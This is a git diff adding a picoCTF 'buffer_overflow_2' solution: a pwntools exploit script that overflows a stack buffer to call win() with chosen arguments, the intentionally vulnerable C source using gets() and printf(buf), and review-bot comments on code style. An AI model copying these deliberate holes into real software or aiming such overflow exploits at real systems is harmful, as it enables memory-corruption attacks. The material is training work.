diff --git a/pwn/buffer_overflow_2/solve.py b/pwn/buffer_overflow_2/solve.py
new file mode 100755
index 0000000..b3dab5e
--- /dev/null
+++ b/pwn/buffer_overflow_2/solve.py
@@ -0,0 +1,31 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -p python3 -i python3 python3Packages.pwntools
+
+from pwn import *
+
+exe = ELF("./vuln")
+
+context.binary = exe
+
+ADDR, PORT, *_ = "saturn.picoctf.net 55214".split()
+
+def conn():
+ if args.REMOTE:
+ r = remote(ADDR, PORT)
+ else:
+ r = process([exe.path])
+
+ return r
+
+def main():
+ r = conn()
+
+ print(r.recvuntil(b"Please enter your string:"))
+ offset = 112 # found with pwndbg
+ payload = b'A' * offset + p32(exe.sym.win) + b'B'*4 + p32(0xCAFEF00D) + p32(0xF00DF00D)
+ r.sendline(payload)
+ print(r.recvall())
+ r.close()
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/pwn/buffer_overflow_2/vuln b/pwn/buffer_overflow_2/vuln
new file mode 100755
index 0000000..accb967
Binary files /dev/null and b/pwn/buffer_overflow_2/vuln differ
diff --git a/pwn/buffer_overflow_2/vuln.c b/pwn/buffer_overflow_2/vuln.c
new file mode 100644
index 0000000..60b8d31
--- /dev/null
+++ b/pwn/buffer_overflow_2/vuln.c
@@ -0,0 +1,43 @@
+#include
+#include
+#include
+#include
+#include
+
+#define BUFSIZE 100
+#define FLAGSIZE 64
+
+void win(unsigned int arg1, unsigned int arg2) {
+ char buf[FLAGSIZE];
+ FILE *f = fopen("flag.txt","r");
+ if (f == NULL) {
+ printf("%s %s", "Please create 'flag.txt' in this directory with your",
+ "own debugging flag.\n");
+ exit(0);
+ }
+
+ fgets(buf,FLAGSIZE,f);
+ if (arg1 != 0xCAFEF00D)
+ return;
+ if (arg2 != 0xF00DF00D)
+ return;
+ printf(buf);
+}
+
+void vuln(){
+ char buf[BUFSIZE];
+ gets(buf);
+ puts(buf);
+}
+
+int main(int argc, char **argv){
+ setvbuf(stdout, NULL, _IONBF, 0);
+
+ gid_t gid = getegid();
+ setresgid(gid, gid, gid);
+
+ puts("Please enter your string: ");
+ vuln();
+ return 0;
+}
+
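Review bot: `r.close()` at the end of main() is skipped whenever `recvall()` raises (an EOF from the remote side, for instance), so the tube is left open; pwntools tubes are context managers, so wrapping the body in `with conn() as r:` closes it on every path and makes the explicit close unnecessary. The constant `offset = 112` is commented with how it was found but not what it measures, so a reader cannot tell what to re-measure if the binary changes; `# distance from buf to the saved return address (measured in pwndbg)` would say so, and the `b'B'*4` filler and the two argument words that win() compares against deserve the same kind of one-line comment rather than bare hex. `PORT` is also left as a string from `split()`; if remote() is relied on to coerce it, a short comment or an explicit `int(PORT)` would make that intent visible.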
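Review bot: vuln.c is the challenge's intentionally vulnerable target, but nothing in the file says so; a header comment such as `/* Unmodified picoCTF challenge source: gets() in vuln() and printf(buf) in win() are the intended bugs, do not "fix". */` would stop a later cleanup pass or a scanner-driven PR from removing the very behaviour the solve script depends on. If this is a verbatim copy of the provided source, keep it byte-identical and put that note in the repository README instead. Separately from the intended overflow, win() never closes `f` and ignores the return value of `fgets()`, so an empty flag.txt would leave `buf` uninitialized before it is printed; harmless in a local debugging setup, but worth a one-line comment so nobody mistakes it for a third intended bug.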